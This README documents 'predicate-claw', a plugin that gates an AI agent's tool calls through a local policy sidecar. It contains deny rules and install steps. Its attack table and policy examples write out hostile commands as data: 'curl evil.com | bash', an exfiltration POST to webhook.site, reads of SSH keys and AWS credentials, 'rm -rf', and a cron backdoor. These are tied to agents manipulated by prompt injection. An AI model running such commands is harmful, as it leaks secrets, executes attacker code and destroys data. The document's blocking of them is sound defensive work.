Drop-in security for OpenClaw. Block unauthorized actions before they execute.

Your agent is one prompt injection away from running rm -rf / or leaking your ~/.aws/credentials.

predicate-claw is a drop-in security plugin that intercepts every tool call and blocks unauthorized actions—before they execute in your OpenClaw. The LLM has no idea the security layer exists. Zero changes to your agent logic. Zero changes to your prompts.

npm install predicate-claw

Not using OpenClaw? We also support other agents (LangChain, Playwright, browser-use, PydanticAI, etc) with 3 lines of code. See the predicate-secure SDK and Enterprise Control Plane.

---

What It Stops

Attack	Without predicate-claw	With predicate-claw
fs.read ~/.ssh/id_rsa	SSH key leaked	Blocked
shell.exec curl evil.com | bash	RCE achieved	Blocked
http.post webhook.site/exfil	Data exfiltrated	Blocked
gmail.delete inbox/**	Emails destroyed	Blocked
fs.write /etc/cron.d/backdoor	Persistence planted	Blocked

Key properties: <25ms latency | Fail-closed | Zero-egress (runs locally) | Auditable

---

Demo

Left pane: The Predicate Authority sidecar evaluates every tool request against security policies in real-time, showing ALLOW or DENY decisions with sub-millisecond latency.

Right pane: The integration demo using the real createSecureClawPlugin() SDK—legitimate file reads succeed, while sensitive file access, dangerous shell commands, and prompt injection attacks are blocked before execution.

---

How It Works

The plugin operates below the LLM. Claude/GPT has no visibility into the security layer and cannot reason about or evade it:

┌─────────────────────────────────────────────────┐
│  LLM requests tool: "Read ~/.ssh/id_rsa"        │
└─────────────────────┬───────────────────────────┘
                      ▼
┌─────────────────────────────────────────────────┐
│  predicate-claw intercepts (invisible to LLM)   │
│  → POST /v1/auth to sidecar                     │
│  → Policy check: DENY (sensitive_path)          │
│  → Throws ActionDeniedError                     │
└─────────────────────┬───────────────────────────┘
                      ▼
┌─────────────────────────────────────────────────┐
│  LLM receives error, adapts naturally           │
│  "I wasn't able to read that file..."           │
└─────────────────────────────────────────────────┘

For the full architecture, see How It Works.

---

Quick Start (3 steps)

1. Install the plugin

// secureclaw.plugin.ts
import { createSecureClawPlugin } from "predicate-claw";

export default createSecureClawPlugin({
  principal: "agent:my-bot",
  sidecarUrl: "http://localhost:8787",
});

2. Start the sidecar

# Download (macOS ARM)
curl -fsSL https://github.com/PredicateSystems/predicate-authority-sidecar/releases/latest/download/predicate-authorityd-darwin-arm64.tar.gz | tar -xz

# Run with dashboard
./predicate-authorityd --policy-file policy.json dashboard

Binaries available for macOS (ARM/Intel), Linux (x64/ARM), and Windows. See all releases, or compile the source by yourself.

3. Run your agent

openclaw run  # All tool calls now protected

That's it. Every tool call is now gated by policy.

---

Writing Policies

Policies are simple JSON. Each rule matches an action and resource pattern:

{ "effect": "deny",  "action": "fs.*",      "resource": "~/.ssh/**" }
{ "effect": "deny",  "action": "fs.*",      "resource": "~/.aws/**" }
{ "effect": "deny",  "action": "shell.exec", "resource": "*rm -rf*" }
{ "effect": "deny",  "action": "shell.exec", "resource": "*curl*|*bash*" }
{ "effect": "deny",  "action": "http.post",  "resource": "**" }
{ "effect": "allow", "action": "fs.read",   "resource": "./src/**" }
{ "effect": "allow", "action": "shell.exec", "resource": "git *" }

Common Patterns

Goal	Rule
Block SSH keys	deny fs.* ~/.ssh/**
Block AWS creds	deny fs.* ~/.aws/**
Block .env files	deny fs.* **/.env*
Block rm -rf	deny shell.exec *rm -rf*
Block curl | bash	deny shell.exec *curl*|*bash*
Block sudo	deny shell.exec *sudo*
Block Gmail delete	deny gmail.delete **
Allow workspace only	allow fs.* ./src/** then deny fs.* **
Allow HTTPS only	allow http.* https://** then deny http.* **

See the Policy Starter Pack for production-ready templates.

---

Installation Options

OpenClaw Plugin (recommended)

import { createSecureClawPlugin } from "predicate-claw";

export default createSecureClawPlugin({
  principal: "agent:my-bot",
  sidecarUrl: "http://localhost:8787",
  failClosed: true,  // Block on errors (default)
});

Direct SDK (any agent framework)

import { GuardedProvider, ToolAdapter } from "predicate-claw";

const provider = new GuardedProvider({ principal: "agent:my-bot" });
const adapter = new ToolAdapter(provider);

const result = await adapter.execute({
  action: "fs.read",
  resource: path,
  execute: async () => fs.readFileSync(path, "utf-8"),
});

Environment Variables

Variable	Description
PREDICATE_SIDECAR_URL	Sidecar URL (default: http://127.0.0.1:8787)
SECURECLAW_PRINCIPAL	Agent identifier
SECURECLAW_FAIL_OPEN	Set true to allow on errors (not recommended)
SECURECLAW_VERBOSE	Set true for debug logging

---

Running the Sidecar

For complete documentation, see the Sidecar User Manual.

Docker

docker run -it -p 8787:8787 \
  -v $(pwd)/policy.json:/policy.json \
  ghcr.io/predicatesystems/predicate-authorityd:latest \
  --policy-file /policy.json dashboard

Binary

# macOS ARM
curl -fsSL https://github.com/PredicateSystems/predicate-authority-sidecar/releases/latest/download/predicate-authorityd-darwin-arm64.tar.gz | tar -xz

# macOS Intel
curl -fsSL https://github.com/PredicateSystems/predicate-authority-sidecar/releases/latest/download/predicate-authorityd-darwin-x64.tar.gz | tar -xz

# Linux x64
curl -fsSL https://github.com/PredicateSystems/predicate-authority-sidecar/releases/latest/download/predicate-authorityd-linux-x64.tar.gz | tar -xz

chmod +x predicate-authorityd
./predicate-authorityd --policy-file policy.json dashboard

Verify

curl http://localhost:8787/health
# {"status":"ok"}

Fleet Management with Control Plane

For managing multiple OpenClaw agents across your organization, connect sidecars to the Predicate Vault control plane. This enables:

• Real-time revocation: Instantly kill a compromised agent across all sidecars
• Centralized policy: Push policy updates to your entire fleet
• Audit streaming: All authorization decisions synced to immutable ledger

./predicate-authorityd \
  --policy-file policy.json \
  --control-plane-url https://api.predicatesystems.dev \
  --tenant-id your-tenant-id \
  --project-id your-project-id \
  --predicate-api-key $PREDICATE_API_KEY \
  --sync-enabled \
  dashboard

Control Plane Option	Description
--control-plane-url	Predicate Vault API endpoint
--tenant-id	Your organization tenant ID
--project-id	Project grouping for agents
--predicate-api-key	API key from Predicate Vault dashboard
--sync-enabled	Enable real-time sync with control plane

---

Configuration Reference

Plugin Options

Option	Default	Description
principal	"agent:secureclaw"	Agent identifier
sidecarUrl	"http://127.0.0.1:8787"	Sidecar URL
failClosed	true	Block on sidecar errors
enablePostVerification	true	Verify execution matched authorization
verbose	false	Debug logging

GuardedProvider Options

const provider = new GuardedProvider({
  principal: "agent:my-agent",
  baseUrl: "http://localhost:8787",
  timeoutMs: 300,
  failClosed: true,
  telemetry: {
    onDecision: (event) => console.log(`[${event.outcome}] ${event.action}`),
  },
});

---

Development

npm install        # Install dependencies
npm run typecheck  # Type check
npm test           # Run tests
npm run build      # Build

Run the Demo

cd examples/integration-demo
./start-demo-split.sh --slow

See Integration Demo for full instructions.

---

Control Plane, Audit Vault & Fleet Management

The Predicate sidecar and SDKs are 100% open-source (MIT or Apache 2.0) and free for local development and single-agent deployments.

However, when deploying a fleet of AI agents in regulated environments (FinTech, Healthcare, Security), security teams cannot manage scattered YAML/JSON policy files or local SQLite databases. For production fleets, we offer the Predicate Control Plane and Audit Vault.

Control Plane Features:

• Global Kill-Switches: Instantly revoke a compromised agent's principal or intent_hash. The revocation syncs to all connected sidecars in milliseconds.
• Immutable Audit Vault (WORM): Every authorized mandate and blocked action is cryptographically signed and stored in a 7-year, WORM-ready ledger. Prove to SOC2 auditors exactly what your agents did and why they were authorized.
• Fleet Management: Manage your fleet of agents with total control
• SIEM Integrations: Stream authorization events and security alerts directly to Datadog, Splunk, or your existing security dashboard.
• Centralized Policy Management: Update and publish access policies across your entire fleet without redeploying agent code.

Learn more about Predicate Systems

---

Related Projects

Project	Description
predicate-authority-sidecar	Rust policy engine
predicate-authority-ts	TypeScript SDK
predicate-authority	Python SDK

---

License

MIT OR Apache-2.0

---

Don't let prompt injection own your agent.
npm install predicate-claw